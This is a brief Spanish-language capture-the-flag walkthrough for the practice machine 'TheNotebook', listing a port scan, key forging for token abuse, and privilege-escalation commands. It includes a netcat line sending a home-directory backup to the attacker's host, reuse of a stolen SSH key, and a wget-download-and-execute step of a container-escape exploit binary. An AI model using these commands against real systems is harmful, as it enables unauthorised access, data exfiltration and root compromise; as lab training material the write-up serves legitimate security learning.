# TheNotebook

**OS**: Linux \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen

## Nmap Scan

`nmap -p- -sV -sC 10.10.10.230`

```
Nmap scan report for 10.10.10.230
Host is up (0.066s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
|   256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_  256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

`ssh-keygen -t rsa -b 4096 -m PEM -f privKey.key`
`openssl rsa -in privKey.key -pubout -outform PEM -out privKey.key.pub`
`python3 -m http.server 7070`


## Escalada de Privilegios (User)

`nc -w 10 10.10.14.33 4444 < /var/backups/home.tar.gz`
`nc -lvnp 4444 > home.tar.gz`
`tar -xvf home.tar.gz`
`chmod 400 home/noah/.ssh/id_rsa`
`ssh -i home/noah/.ssh/id_rsa noah@10.10.10.230`




## Escalada de Privilegios (Root)

`go build main.go`
`sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash`
`wget http://10.10.14.33:7070/main && chmod +x main && ./main`
`chmod +x main`
`./main`
`sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh`






## Referencias
https://jwt.io/ \
https://github.com/Frichetten/CVE-2019-5736-PoC
